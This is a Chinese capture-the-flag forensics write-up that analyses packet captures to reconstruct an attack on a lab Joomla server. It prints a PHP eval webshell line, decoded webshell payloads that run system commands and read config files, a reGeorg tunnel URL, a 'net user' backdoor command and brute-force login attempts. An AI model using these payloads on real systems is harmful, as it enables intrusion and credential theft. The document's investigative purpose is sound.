WriteUps
信息安全铁人三项赛总决赛总结(企业赛)
信息安全铁人三项赛总决赛(数据赛)第二题
信息安全铁人三项赛总决赛(数据赛)第三题
信息安全铁人三项赛总决赛(数据赛)第四题
首先根据队友的发现 , 找到了攻击者的 ip : 172.16.10.121
然后这条命令将所有的 http 数据包的请求以及相应全部提取出来
写了一个 Shell 脚本 , 提取完所有的包大概也就用了两分钟左右的时间
tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -r 1_00005_20170908171421.pcap > 5
#!/bin/bash
target_file='http.txt'
target_folder='http'
mkdir ${target_folder}
touch ${target_folder}/${target_file}
for file in `ls *.pcap`;
do
echo "Dumping http package in ${file}..."
tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -r $file > ${target_folder}/${file}.txt
echo "${file} Done!"
done
for file in `ls ${target_folder}/*.txt`;
do
cat $file >> ${target_folder}/${target_file}
done
但是如果使用 wireshark 会很费时间
不得不感叹命令行工具的强大
然后进入 http 文件夹
直接搜索各种web攻击方式常见的关键字即可
比如如下几道题目 :
- 询问攻击者进行内网端口扫描的IP范围
第一题 , 想到攻击者进行内网渗透 , 可能会使用到 reGeorg 这个工具
其中很重要的关键字就是 tunnel , tunnel.php , tunnel.nosocket.php
尝试进行搜索
grep -r -n 'tunnel.php' http.txt
发现很多类似下面的结果 :
POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.131&port=21
事实上如果大家对 reGeorg 熟悉的话 , 直接就可以搜索关键字 :
?cmd=connect&target=
因为 reGeorg 在建立一个新的 TCP 链接的时候会使用这样的接口
grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F ' HTTP' '{print $1}' | sort | uniq | sed 's/\&port\=/ /g'
grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F '&port' '{print $1}' | sort | uniq
这条命令就可以解决这个问题了 :
答案 : 192.168.28.120-192.168.28.135
- 攻击者第一次使用的 webshell 的链接密码
既然是 webshell , 又是 php 的网站
那就直接先搜索 eval / assert 之类的关键字
grep -n 'eval(' [0-9]*.txt
由于主办方提供的数据包已经是时间顺序
那么在外网渗透测试的时候使用的 webshell 链接密码必然是 : Jshell
内网渗透测试应该是 Bshell 或者 cmd_shell
攻击者在内网渗透过程中BlueCMS使用的 webshell 链接密码
答案 : Bshell内网 bluecms 的第一个网络适配器的ip
网络适配器的 IP
那么可能是执行了系统的 ipconfig 或者 ifconfig 命令
可以直接 grep 一下这些命令的关键字
答案 : 192.168.20.117
是一台 Windows 服务器
- 攻击者在内网添加了一个用户 , 求用户名密码
既然是 Windows 服务器 , 那么添加用户的命令当然是 net user [USERNAME] [PASSWORD] /add 了
cat -n http.txt | grep 71202 | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'
net user hacker hacker /add
做到这里 , 我认为还是不要着急做题 , 先分析攻击者攻击流程比较好
首先从一句话木马入手
首先看 JShell
grep 'Jshell=' http.txt | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'
with open("shell") as f:
for line in f:
import urllib
print "-" * 32
data = ("Jshell=@eval(ba" + urllib.unquote(line)[16:-1])
print data
data = data.split("&")
for i in data[1:]:
d = i.split("=")
key = d[0]
value = ("".join("%s=" % (i) for i in d[1:]))[0:-1]
try:
print "%s=%s" % (key, value.decode("base64"))
except:
print "%s=%s" % (key, (value + (4 - len(d[1]) % 4) * "=").decode("base64"))
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// 获取操作系统信息以及用户名
--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxc']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// 读取目录 C:\\phpstudy\\WWW\\joomla\\ 下的所有文件
y.P.l.l...Rb.P.......8 12:47:10 1212 0666
LICENSE.txt 2015-09-08 12:47:10 18092 0666
README.txt 2015-09-08 12:47:10 4213 0666
robots.txt 2015-09-08 12:47:10 842 0666
web.config.txt 2015-09-08 12:47:10 1690 0666
--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxcdHVubmVsLnBocA==', 'z2=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\tunnel.php
z2=
// 上传文件到 C:\\phpstudy\\WWW\\joomla\\tunnel.php
--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxc']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// 读取目录 C:\\phpstudy\\WWW\\joomla\\ 下的所有文件
--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]
// 执行系统命令 netstat -an | find "ESTABLISHED"
第二题 ›› strings *.pcap | grep ESTABLISHED
->| TCP 127.0.0.1:1629 127.0.0.1:3306 ESTABLISHED
TCP 127.0.0.1:3306 127.0.0.1:1629 ESTABLISHED
TCP 192.168.20.117:80 172.16.10.115:1628 ESTABLISHED
TCP 192.168.20.117:80 172.16.10.121:62858 ESTABLISHED
TCP 192.168.20.117:80 172.16.10.121:62859 ESTABLISHED
TCP 192.168.20.117:1628 172.16.10.115:80 ESTABLISHED
TCP 192.168.28.130:2318 192.168.28.131:21 ESTABLISHED
TCP 192.168.28.130:2322 192.168.28.131:21 ESTABLISHED
TCP 192.168.28.130:3473 192.168.28.131:21 ESTABLISHED
--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZ3aG9hbWkmZWNobyBbU10mY2QmZWNobyBbRV0=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&whoami&echo [S]&cd&echo [E]
// 执行系统命令 whoami
admin-6ef5d71ed\administrator
--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZpcGNvbmZpZyZlY2hvIFtTXSZjZCZlY2hvIFtFXQ==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&ipconfig&echo [S]&cd&echo [E]
// 执行系统命令 ipconfig
->|
Windows IP Configuration
Ethernet adapter ........ 2:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.20.117
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.20.1
Ethernet adapter ........:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.28.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
[S]
C:\phpstudy\WWW\joomla
[E]
|<-
--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXQgdXNlciBoYWNrZXIgaGFja2VyIC9hZGRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /addd&echo [S]&cd&echo [E]
// 执行系统命令 net user hacker hacker /addd
// 语法错误执行失败
->|.... /ADDD ......
..............:
NET USER
[username [password | *] [options]] [/DOMAIN]
username {password | *} /ADD [options] [/DOMAIN]
username [/DELETE] [/DOMAIN]
...... NET HELPMSG 3506 ..................
[S]
--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXQgdXNlciBoYWNrZXIgaGFja2VyIC9hZGQmZWNobyBbU10mY2QmZWNobyBbRV0=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /add&echo [S]&cd&echo [E]
// 执行系统命令 net user hacker hacker /add
执行成功
--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxcY29uZmlndXJhdGlvbi5waHA=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// 读取 C:\\phpstudy\\WWW\\joomla\\configuration.php 文件内容
->|<?php
class JConfig {
public $offline = '0';
public $offline_message = '.....................<br /> ..................';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'test';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'mysqlpasswd';
public $db = 'joomla';
public $dbprefix = 'shf76_';
public $live_site = '';
public $secret = 'BjbqVIMNAt3nB7Dc';
public $gzip = '0';
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy/index.php?option=com_help&k
17:22:31.607905 IP 192.168.20.117.http > 172.16.10.121.63886: Flags [.], seq 4381:5841, ack 769, win 63471, length 1460: HTTP
E...|.@........u..
y.P.....T...8P.......eyref=Help{major}{minor}:{keyref}';
public $ftp_host = '';
public $ftp_port = '';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
public $ftp_enable = '0';
public $offset = 'UTC';
public $mailonline = '1';
public $mailer = 'mail';
public $mailfrom = 'admin@123.com';
public $fromname = 'test';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = '0';
public $smtpuser = '';
public $smtppass = '';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = '25';
public $caching = '0';
public $cache_handler = 'file';
public $cachetime = '15';
public $MetaDesc = 'sssss';
public $MetaKeys = '';
public $MetaTitle = '1';
public $MetaAuthor = '1';
public $MetaVersion = '0';
public $robots = '';
public $sef = '1';
public $sef_rewrite = '0';
public $sef_suffix = '0';
public $unicodeslugs = '0';
public $feed_limit = '10';
public $log_path = 'C:\\phpstudy\\WWW\\joomla/logs';
public $tmp_path = 'C:\\phpstudy\\WWW\\joomla/tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $memcache_persist = '1';
public $memcache_compress = '0';
public $memcache_server_host = 'localhost';
public $memcache_server_port = '11211';
public $memcached_persist = '1';
public $memcached_compress = '0';
public $memcached_server_host = 'localhost';
public $memcached_server_port = '11211';
public $redis_persist = '1';
public $redis_server_host = 'localhost';
pub
17:22:31.622948 IP 192.168.20.117.http > 172.16.10.121.63886: Flags [FP.], seq 5841:6540, ack 769, win 63471, length 699: HTTP
E...|.@........u..
y.P.........8P...H^..lic $redis_server_port = '6379';
public $redis_server_auth = '';
public $redis_server_db = '0';
public $proxy_enable = '0';
public $proxy_host = '';
public $proxy_port = '';
public $proxy_user = '';
public $proxy_pass = '';
public $massmailoff = '0';
public $MetaRights = '';
public $sitename_pagetitles = '0';
public $force_ssl = '0';
public $session_memcache_server_host = 'localhost';
public $session_memcache_server_port = '11211';
public $session_memcached_server_host = 'localhost';
public $session_memcached_server_port = '11211';
public $frontediting = '1';
public $feed_email = 'author';
public $cookie_domain = '';
public $cookie_path = '';
public $asset_id = '1';
|<-
--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7', 'z1=C:\\\\phpstudy\\\\WWW\\\\joomla\\\\configuration.php']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// 读取 C:\\phpstudy\\WWW\\joomla\\configuration.php 文件内容
看一下这个 Jshell 是如何被写入服务器的
前三行应该就是利用漏洞将文件内容写入
可以看到 , 攻击者利用了文件
/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA
编辑了 index.php ("L2luZGV4LnBocA".decode("base64") == "index.php") 文件
在 index 中插入一行
<?php eval($_POST['Jshell']);?>
继续向上回溯 , 攻击者如何登录 ?
http ›› grep -n -C 32 'POST /administrator/' [0-9]*.txt | grep 'username' | grep -o 'username.*'
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=admin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
